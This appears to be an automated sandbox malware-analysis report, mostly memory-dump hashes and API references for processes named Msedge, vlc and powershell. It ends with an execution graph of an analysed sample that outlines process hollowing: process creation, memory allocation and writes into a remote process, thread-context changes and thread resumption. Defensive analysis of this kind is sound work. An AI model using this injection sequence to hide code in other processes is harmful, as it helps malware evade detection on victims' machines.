                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: Xlength_error@std@@
                                    • String ID: string too long$vector<bool> too long
                                    • API String ID: 1004598685-1183328865
                                    • Opcode ID: 99b7cb9ba424e8a71ac46053b43b1e13783d236c9af943f7262ad633b9f0ead6
                                    • Instruction ID: 77760df70946c1817f2e39c5abb9a74f524cb3567baa3a826ca4e0fa5a0de15f
                                    • Opcode Fuzzy Hash: 99b7cb9ba424e8a71ac46053b43b1e13783d236c9af943f7262ad633b9f0ead6
                                    • Instruction Fuzzy Hash: 1CC00219D15C4EA5E93CBBA19C750642731FB6D300F604D31D31D8BD715D3C75565613
                                    APIs
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00000000), ref: 00007FF62B649B4E
                                    • ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@@Z.MSVCP140(?,?,?,?,?,?,?,?,00000000), ref: 00007FF62B649B5A
                                    • ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@@Z.MSVCP140(?,?,?,?,?,?,?,?,00000000,?,00000000,00007FF62B643114,?,?,00000000,00007FF62B644001), ref: 00007FF62B649B65
                                    • ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@@Z.MSVCP140(?,?,?,?,?,?,?,?,00000000,?,00000000,00007FF62B643114,?,?,00000000,00007FF62B644001), ref: 00007FF62B649B70
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: W4error_type@regex_constants@1@@Xregex_error@std@@$_invalid_parameter_noinfo_noreturn
                                    • String ID:
                                    • API String ID: 853480605-0
                                    • Opcode ID: bee4f38196beb3b8a7a72e55541a746e88538d4e3c55e90de900931ecddeb9c7
                                    • Instruction ID: 924a3a204256a1b2d90db98a466d16d852d7ac516846c8768585484bd3e333f7
                                    • Opcode Fuzzy Hash: bee4f38196beb3b8a7a72e55541a746e88538d4e3c55e90de900931ecddeb9c7
                                    • Instruction Fuzzy Hash: 7EE19672A48E458AEE788A2AC9A477C27B1FB0D784F044135CB5D877E5CF78E494E702
                                    APIs
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF62B647CE8), ref: 00007FF62B647FC8
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62B647CE8), ref: 00007FF62B6480C4
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62B648003
                                      • Part of subcall function 00007FF62B64CC88: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62B648F80), ref: 00007FF62B64CCA2
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62B6480FF
                                      • Part of subcall function 00007FF62B64CC88: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62B64CCBE
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn$malloc
                                    • String ID:
                                    • API String ID: 961033532-0
                                    • Opcode ID: 5a3981d2286dfb97adab2a8487f28cd1e0e5411dfcf1711b72f4f8558bf23c51
                                    • Instruction ID: 74a538469df6724c3fc4d3e5816f5087fb6cbdad82cdadb3f60fc4bc3a09123c
                                    • Opcode Fuzzy Hash: 5a3981d2286dfb97adab2a8487f28cd1e0e5411dfcf1711b72f4f8558bf23c51
                                    • Instruction Fuzzy Hash: 9FB1D671A09E8286EE749B25AA602BD6371FF49BC0F184531DB5D87BA6CF3CF4519302
                                    APIs
                                    • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAPEADXZ.MSVCP140 ref: 00007FF62B64B24E
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: D@std@@@std@@Pninc@?$basic_streambuf@U?$char_traits@
                                    • String ID:
                                    • API String ID: 3551493264-0
                                    • Opcode ID: 72b3cd7a3345ff34c930a9702fafe002aedeed9dbe8e7e9e2d77e1d6d080af4d
                                    • Instruction ID: 24ecea243875a0f5c2e18c9de00d061ea8ee1fa53ffb3a67601539bded8ee371
                                    • Opcode Fuzzy Hash: 72b3cd7a3345ff34c930a9702fafe002aedeed9dbe8e7e9e2d77e1d6d080af4d
                                    • Instruction Fuzzy Hash: 86515826A08F4285EF268F2AD96037D7761FB49F94F484531CE5D977B8DE38D482A301
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter_noinfo_noreturn$?tolower@?$ctype@D@std@@memmove
                                    • String ID:
                                    • API String ID: 1594617108-0
                                    • Opcode ID: dbabbb78ba67c4d8a946ca0e21ab842105879f4c107f55675a75131463aa0b99
                                    • Instruction ID: 23dc1eed525ee01b4e790cc8a447a2330115c65243fb3972201503710aa81a66
                                    • Opcode Fuzzy Hash: dbabbb78ba67c4d8a946ca0e21ab842105879f4c107f55675a75131463aa0b99
                                    • Instruction Fuzzy Hash: AF517CA2F14A5589FF10CBA5D8553AC2771FB08BA8F184235CE1C6BBE9DFB89085D341
                                    APIs
                                      • Part of subcall function 00007FF62B644A30: ?tolower@?$ctype@D@std@@QEBAPEBDPEADPEBD@Z.MSVCP140 ref: 00007FF62B644ACD
                                      • Part of subcall function 00007FF62B644A30: memmove.VCRUNTIME140 ref: 00007FF62B644B43
                                      • Part of subcall function 00007FF62B644A30: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62B644B87
                                      • Part of subcall function 00007FF62B644A30: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62B644BBD
                                    • memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000001,?,000000FF,?,00000000,00007FF62B6486D7), ref: 00007FF62B646BA6
                                    • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000001,?,000000FF,?,00000000,00007FF62B6486D7), ref: 00007FF62B646C21
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,?,000000FF,?,00000000,00007FF62B6486D7), ref: 00007FF62B646C84
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,?,000000FF,?,00000000,00007FF62B6486D7), ref: 00007FF62B646C8B
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter_noinfo_noreturn$?tolower@?$ctype@D@std@@memcmpmemmovememset
                                    • String ID:
                                    • API String ID: 3989215635-0
                                    • Opcode ID: 3c9eb38ab5c6b93aa1fe3ccc97c34aa897d6be996ee0578d3a895c0be7e936d7
                                    • Instruction ID: fcfa1bff3fc13c61714b60aab63ecc4171e9b787c8a86d71c0ce0d1a1e76d100
                                    • Opcode Fuzzy Hash: 3c9eb38ab5c6b93aa1fe3ccc97c34aa897d6be996ee0578d3a895c0be7e936d7
                                    • Instruction Fuzzy Hash: E641DC62B04E4184FF24CBA6D8603ED2372FB4CBA8F440632DE1D87BE9DE68D4859301
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                    • String ID:
                                    • API String ID: 2016347663-0
                                    • Opcode ID: c3c948dbb578ae6a538e68a4d0a20b52b8a687722b8855c772a045323c7bbc69
                                    • Instruction ID: a56dc7d7be5f468cee701cb538ec6cbd724909c6e2f2ca41b3c19140ae19b8dd
                                    • Opcode Fuzzy Hash: c3c948dbb578ae6a538e68a4d0a20b52b8a687722b8855c772a045323c7bbc69
                                    • Instruction Fuzzy Hash: A6313661708A4281ED24DB12AA2423D6371FF08BE0F588631DE7D47BF5DE7CE0819305
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF62B6440A7), ref: 00007FF62B645913
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF62B6440A7), ref: 00007FF62B645947
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF62B6440A7), ref: 00007FF62B645964
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF62B6440A7), ref: 00007FF62B645986
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 38aaa1debd1dd55f83f0411f5cd8ce79a3f98df747aae173c4bac2d37a15f5f7
                                    • Instruction ID: 0b72b70f2a8b95f18501315f14eb3b309ad2fb1d4f7527de2d0b3c60516e6bd9
                                    • Opcode Fuzzy Hash: 38aaa1debd1dd55f83f0411f5cd8ce79a3f98df747aae173c4bac2d37a15f5f7
                                    • Instruction Fuzzy Hash: EC21DF26A08E9286EE65DF12EC601796374FB4CFD0B085432DF4E57B6ACE3CE4519341
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1999972375.00007FF632021000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF632020000, based on PE: true
                                    • Associated: 00000013.00000002.1999928726.00007FF632020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                    • Associated: 00000013.00000002.2000025017.00007FF63203B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                    • Associated: 00000013.00000002.2000045776.00007FF63203C000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                    • Associated: 00000013.00000002.2000676341.00007FF6325A9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                    • Associated: 00000013.00000002.2000725570.00007FF6325AC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                    • Associated: 00000013.00000002.2000759811.00007FF6325B5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                    • Associated: 00000013.00000002.2000794446.00007FF6325B8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                    • Associated: 00000013.00000002.2000831059.00007FF6325B9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff632020000_vlc.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ba073a1d48b37eaaf8d75c2580dfac996d96d24c611e188025e5d7499d33fba8
                                    • Instruction ID: 361f8142b97b11f17ca05e3402e45b2da2b5ae453129b0acadedb5eae2508ad4
                                    • Opcode Fuzzy Hash: ba073a1d48b37eaaf8d75c2580dfac996d96d24c611e188025e5d7499d33fba8
                                    • Instruction Fuzzy Hash: 25B012B091430984F3012F01D84225C32606F18B44F814032D40C83353CFFD90445B20
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1983889255.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9bba0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07d2a4c9e323f5e0021011d00da234c515dda163547b7239c8317dfe288c0502
                                    • Instruction ID: cea3ac8a6694a0a250067c3ef481dd41d5d4f415d91eb87798a19a8d4e2e37a4
                                    • Opcode Fuzzy Hash: 07d2a4c9e323f5e0021011d00da234c515dda163547b7239c8317dfe288c0502
                                    • Instruction Fuzzy Hash: 40B11422F0EBCA0FE7A69A6858B11747BE1EF56318B4A01FBD04DCB1E3D918AD45C341
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1982130934.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c5283e8176851cfacc0f95375cab288333b344bfbbdf39238afc7c5a6e6d2f8
                                    • Instruction ID: 03dcec0b32bd906ac0e958ecc0363c9edc9695e580d4fb9799b2c05b359a7046
                                    • Opcode Fuzzy Hash: 0c5283e8176851cfacc0f95375cab288333b344bfbbdf39238afc7c5a6e6d2f8
                                    • Instruction Fuzzy Hash: 22816530A1DB494FE758EF18C4A4AB5B7E0EF95310F1102BDD0DAC72A6DA65B882C741
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1982130934.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a6ef0c403a92e59f206ed8c63e293f9c579cac67a5e1b45a14118587d66035a9
                                    • Instruction ID: bf810ac3d5db8bc3b73bddd695a06c6f5dc514f0a41c4c08270c99fb2d54800d
                                    • Opcode Fuzzy Hash: a6ef0c403a92e59f206ed8c63e293f9c579cac67a5e1b45a14118587d66035a9
                                    • Instruction Fuzzy Hash: 8B41083190CB4C4FDB1C9B5C984A7E97BE0EBA5321F10422FE049C3692CAB56456CB82
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1982130934.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8100877b460f73fa6159c2994367021dd8f00fc2edece7344c9d0631e7acc6dd
                                    • Instruction ID: 7c264a86ba29230e1ba185c57d558ad6b181cbf84317f72af2036f6b1a663145
                                    • Opcode Fuzzy Hash: 8100877b460f73fa6159c2994367021dd8f00fc2edece7344c9d0631e7acc6dd
                                    • Instruction Fuzzy Hash: A231253190C74C8EEB58DFAC984A7E97BE0EB96330F04826FD04CC7192D674641ACB92
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1982130934.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 66bcf49b8bbf6f5f6366535041a94890e3ab38d2388968556f2377989b340df6
                                    • Instruction ID: f7b3cadb726ddb2327c52e2ca41374fbb3fd257b1fb5d56f272e7cab1c4043d2
                                    • Opcode Fuzzy Hash: 66bcf49b8bbf6f5f6366535041a94890e3ab38d2388968556f2377989b340df6
                                    • Instruction Fuzzy Hash: 8931087191CB4C8FDB58DB5CDC4A6A97BE0FBA9320F00426FE449C3252DA74A855CBC2
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1979987270.00007FFD9B9BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9b9bd000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4a15d2ef76b0cac7c3ca77f7736a4645119af02b7a65c465bccd698ae55832fb
                                    • Instruction ID: 7c4a5654cf23b621e9b8fb029ec87d48593b6dbc4dc831725f4f7710735d9afe
                                    • Opcode Fuzzy Hash: 4a15d2ef76b0cac7c3ca77f7736a4645119af02b7a65c465bccd698ae55832fb
                                    • Instruction Fuzzy Hash: E541187180EBC45FD7969B3898559523FF4EF57320B1605DFE088CB1A3D624AC4ACBA2
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1982130934.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 590de77f2bff44884e379c9c96a90e62b7f42966fdf6f75cd2e5ad7e20c32bf2
                                    • Instruction ID: 65a9837cf265c2c908ca4e5bc3a4c9dcd9009e6d656558e1b2ef0700ac6ad077
                                    • Opcode Fuzzy Hash: 590de77f2bff44884e379c9c96a90e62b7f42966fdf6f75cd2e5ad7e20c32bf2
                                    • Instruction Fuzzy Hash: 1C01847020CB0C4FD748EF0CE051AA5B3E0FB85360F10066EE58AC36A1DA32E881CB45
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1982130934.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 996445b9244b70b5463d8174cc5747e3f56f0a0953b0e73921b0615144be9a4c
                                    • Instruction ID: e829bdfa9a9eef8e36a623794851144025ba83be84ed9edea5244f8664de9bc4
                                    • Opcode Fuzzy Hash: 996445b9244b70b5463d8174cc5747e3f56f0a0953b0e73921b0615144be9a4c
                                    • Instruction Fuzzy Hash: 8FF0E23190868D8FCB0AEF6888659E57FA0FF66310B0502DBE459C71B2DB749958CBC2
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1983889255.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9bba0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c377bbdabe9acb16ec3474ab5fdd24ce3bcc635a2c71779390684c79e2bac9e
                                    • Instruction ID: f39c763a18ea8d23aaffd412d54acc9951fe8a16bc6fff0d2174bd0bf98f2df6
                                    • Opcode Fuzzy Hash: 2c377bbdabe9acb16ec3474ab5fdd24ce3bcc635a2c71779390684c79e2bac9e
                                    • Instruction Fuzzy Hash: 98F0BE32B0E5498FD768EA4CE4518A873E0FF45325B1100BAE16DC70F3CA25EC41CB45
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1983889255.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9bba0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0f93d42b695a4ee6afda505087005769b2d7ba4e018281e977f26834c08a37a4
                                    • Instruction ID: b6a6f8e49073d46ba0248c181347fab71192253a3c3a44c8e8bdc8eb64dfd4a1
                                    • Opcode Fuzzy Hash: 0f93d42b695a4ee6afda505087005769b2d7ba4e018281e977f26834c08a37a4
                                    • Instruction Fuzzy Hash: A8F05E32B0E5498FE768EA5CE4518A877E0FF4532571500BAE15EC74A3DA26AC50C740
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1983889255.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9bba0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c14c63b850d1409040f694b71c643fecf9fd8ff781f5283263a1f1daeeeb65e8
                                    • Instruction ID: c4d29b3d09e880b390991a2ac33d34be86d77132451868ac55264eba1b037e43
                                    • Opcode Fuzzy Hash: c14c63b850d1409040f694b71c643fecf9fd8ff781f5283263a1f1daeeeb65e8
                                    • Instruction Fuzzy Hash: 8EF0A03171CF044FE748EE2DE449AA2B3E0FBA8314F10462FE44AC3291DA21E8818782
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1982130934.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c6223e563e96ea2a5414e4b70cf5f623b033e0defffe8c045e428932866aa0d
                                    • Instruction ID: 62ec571a9cbe8b767b3cddb2eecc11c839979279e0850230911a2b95939b7a98
                                    • Opcode Fuzzy Hash: 2c6223e563e96ea2a5414e4b70cf5f623b033e0defffe8c045e428932866aa0d
                                    • Instruction Fuzzy Hash: 6FE0862074D6494AD3149668A0506F97E819BC9224F54067DE4DE823A6C8496AC15352

                                    Execution Graph

                                    Execution Coverage:16.8%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:58
                                    Total number of Limit Nodes:7
                                    execution_graph 2305 e80848 2306 e80853 2305->2306 2315 e82612 2306->2315 2308 e808cf 2313 e82612 8 API calls 2313->2308 2316 e8261a 2315->2316 2317 e808a3 2316->2317 2341 e82e5c 2316->2341 2348 e82921 2316->2348 2317->2313 2320 e82867 2317->2320 2325 e827d1 2317->2325 2330 e827fc 2317->2330 2335 e828c8 2317->2335 2321 e82801 2320->2321 2321->2320 2322 e828a4 2321->2322 2323 e82e5c 2 API calls 2321->2323 2324 e82921 7 API calls 2321->2324 2322->2308 2323->2321 2324->2321 2327 e827c8 2325->2327 2326 e828a4 2326->2308 2327->2326 2328 e82e5c 2 API calls 2327->2328 2329 e82921 7 API calls 2327->2329 2328->2327 2329->2327 2331 e827c8 2330->2331 2332 e828a4 2331->2332 2333 e82e5c 2 API calls 2331->2333 2334 e82921 7 API calls 2331->2334 2332->2308 2333->2331 2334->2331 2336 e82801 2335->2336 2337 e82861 2335->2337 2338 e828a4 2336->2338 2339 e82e5c 2 API calls 2336->2339 2340 e82921 7 API calls 2336->2340 2337->2308 2338->2308 2339->2336 2340->2336 2344 e82e5f CreateProcessW 2341->2344 2347 e82c8a 2341->2347 2343 e82e05 2343->2316 2346 e82fb9 2344->2346 2347->2343 2368 e81ac0 2347->2368 2349 e82943 2348->2349 2372 e81ec8 2349->2372 2351 e829c4 2352 e81ed4 Wow64SetThreadContext 2351->2352 2360 e82c4a 2351->2360 2353 e82a1c 2352->2353 2354 e81ee0 ReadProcessMemory 2353->2354 2353->2360 2355 e82a5a 2354->2355 2356 e82aee VirtualAllocEx 2355->2356 2355->2360 2357 e82b35 2356->2357 2359 e81ac0 WriteProcessMemory 2357->2359 2357->2360 2358 e81ac0 WriteProcessMemory 2358->2360 2361 e82b6c 2359->2361 2360->2358 2367 e82c68 2360->2367 2361->2360 2362 e81ac0 WriteProcessMemory 2361->2362 2363 e82bbe 2362->2363 2363->2360 2364 e81acc Wow64SetThreadContext 2363->2364 2365 e82c08 2364->2365 2365->2360 2366 e82c10 ResumeThread 2365->2366 2366->2360 2367->2316 2369 e83210 WriteProcessMemory 2368->2369 2371 e8329b 2369->2371 2371->2347 2373 e82e68 CreateProcessW 2372->2373 2375 e82fb9 2373->2375

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 57 e82921-e829c6 call e81ec8 66 e829cc-e82a05 57->66 67 e82d74-e82d87 57->67 72 e82d8e 66->72 74 e82a0b-e82a1e call e81ed4 66->74 67->72 76 e82d93-e82dc6 72->76 78 e82d5a-e82d6d 74->78 79 e82a24-e82a2e 74->79 92 e82dc8-e82df8 call e81ac0 76->92 93 e82e05-e82e09 76->93 78->67 79->72 81 e82a34-e82a5c call e81ee0 79->81 86 e82d40-e82d53 81->86 87 e82a62-e82a70 81->87 86->78 90 e82ad0-e82b33 VirtualAllocEx 87->90 91 e82a72-e82aad 87->91 104 e82b3c-e82b53 90->104 105 e82b35-e82b3b 90->105 99 e82aaf-e82ab5 91->99 100 e82ab6-e82aca 91->100 112 e82dfd-e82dff 92->112 99->100 100->90 103 e82d26-e82d39 100->103 103->86 108 e82b59-e82b6e call e81ac0 104->108 109 e82d0c-e82d1f 104->109 105->104 119 e82cf2-e82d05 108->119 120 e82b74-e82b9b 108->120 109->103 112->93 115 e82c8a-e82c9d 112->115 129 e82ca4-e82cb7 115->129 119->109 120->76 126 e82ba1-e82bc0 call e81ac0 120->126 126->129 133 e82bc6-e82bdd 126->133 136 e82cbe-e82cd1 129->136 137 e82bdf-e82be2 133->137 138 e82be5-e82bf4 133->138 147 e82cd8-e82ceb 136->147 137->138 138->72 139 e82bfa-e82c0a call e81acc 138->139 139->136 